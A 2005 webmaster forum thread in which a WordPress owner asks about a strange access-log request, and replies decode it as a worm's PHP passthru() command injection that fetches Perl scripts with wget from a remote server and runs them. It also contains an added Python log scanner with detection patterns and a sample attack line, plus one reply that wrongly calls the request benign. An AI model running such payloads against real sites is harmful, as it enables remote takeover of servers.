What is this? Possible hack attempt?

Something strange I noticed in my access log

mike3k

3:58 am on Feb 7, 2005 (gmt 0)

Checking my site stats, I found several requests like the following which seem to be some kind of scripting attack. I'm running WordPress.

<Snipped example URL - please describe>

[edited by: trillianjedi at 9:21 am (utc) on Feb. 7, 2005]
[edit reason] TOS #13 [/edit]

keyplyr

4:34 am on Feb 7, 2005 (gmt 0)

You should exemplify your domain per TOS [webmasterworld.com]:

http://example.com
or
http://mydomain.com

mike3k

9:06 pm on Feb 7, 2005 (gmt 0)

Sorry - I just copied and pasted it UNEDITED from my Analog report. Here it is again - can anyone identify it?

/blog/index.php?cat=4&rush=echo%20_START_%3B%20cd%20/tmp;wget%20server2.norcomp.no/~private/a.txt;wget%20server2.norcomp.no/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20echo%20_END_&highlight=%2527.passthru%28$HTTP_GET_VARS%5Brush%5D%29.%2527%27;

keyplyr

9:52 pm on Feb 7, 2005 (gmt 0)

I'm no PHP whiz, but it appears that someone is serving up your webpage from info in their directory. This is not necessarily a negative move. Many sites use something like this (example: about.com) to let users see a particular site without letting that user leave their own site.

Try a reverse DNS [dnsstuff.com] to see who is at work here. If it bothers you, ban their IPs from accessing your files.

lammert

12:23 am on Feb 8, 2005 (gmt 0)

I am quite sure this IS an attack. If you decode the %% values by the ASCII values they represent, you get a shell script. They pull two perl scripts from a server, then execute these scripts in perl.

echo _START_;
cd /tmp;
wget sss.#*$!.tld/~private/a.txt;
wget sss.xxx.tld/~private/w.txt;
perl a.txt;
rm a.txt;
perl w.txt;
rm w.txt;
echo _END_&highlight=%'.passthru($HTTP_GET_VARS[rush]).%'';

lammert

1:00 am on Feb 8, 2005 (gmt 0)

I did some further investigation.

According to sources outside WW this seems to be a variant of a worm circulating to attack phpBB and other php based websites. Some sources suggest you block all requests with "rush" in the string in the .htaccess file, but other sources claim that this is just one variant and it can easily mutate to another unrecognizable form, so blocking everything with "rush" doesn't work.
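Decoding the request the way lammert does above, and then matching on what comes out rather than on the literal "rush" that his second post says can change, as an added Python example that is not part of this thread: the log line format, the client IP and the download host are assumed placeholders, not values from the original post.

```python
import re
from urllib.parse import unquote_plus

# PHP calls that hand a string to the shell or eval it; none belong in a query string.
DANGEROUS_CALLS = re.compile(r"\b(?:passthru|system|exec|shell_exec|popen|eval)\s*\(", re.I)
# Shell fragments typical of a "download it, run it, delete it" payload.
SHELL_FRAGMENTS = re.compile(r"\b(?:wget|curl)\s+\S+|\bperl\s+\S+|\bcd\s+/tmp\b", re.I)
# Request target inside an Apache-style access log line (assumed log format).
REQUEST_TARGET = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def fully_decode(value, max_rounds=3):
    """Percent-decode until nothing changes, so %2527 -> %27 -> ' is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target):
    """Decode each query parameter and list the rules it trips. Rules run on the
    decoded values, not on parameter names, so renaming 'rush' does not evade them."""
    params = {}
    for pair in target.partition("?")[2].split("&"):
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = fully_decode(value)
    findings = []
    for name, value in params.items():
        if DANGEROUS_CALLS.search(value):
            findings.append(f"{name}: PHP command-execution call")
        if SHELL_FRAGMENTS.search(value):
            findings.append(f"{name}: shell download/execute fragment")
    return {"params": params, "findings": findings}

def scan_access_log(lines):
    """Return (line_number, findings) for every log line that trips a rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_TARGET.search(line)
        findings = inspect_request(match.group(1))["findings"] if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample log line shaped like the request posted in this thread;
# the client IP and download host are placeholders, not the real ones.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Feb/2005:03:10:25 +0000] "GET /blog/index.php?cat=4&rush=cd%20/tmp;wget%20'
    'dl.attacker.example/a.txt;perl%20a.txt;rm%20a.txt&highlight=%2527.passthru%28$HTTP_GET_VARS%5Brush%5D%29.%2527%27; HTTP/1.1" 200 5120',
]
```

Running `scan_access_log` over a real log only needs the request target to be the quoted field, so the `REQUEST_TARGET` pattern is the one place to adjust for a different log format.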

keyplyr

2:33 am on Feb 8, 2005 (gmt 0)

I block "wget"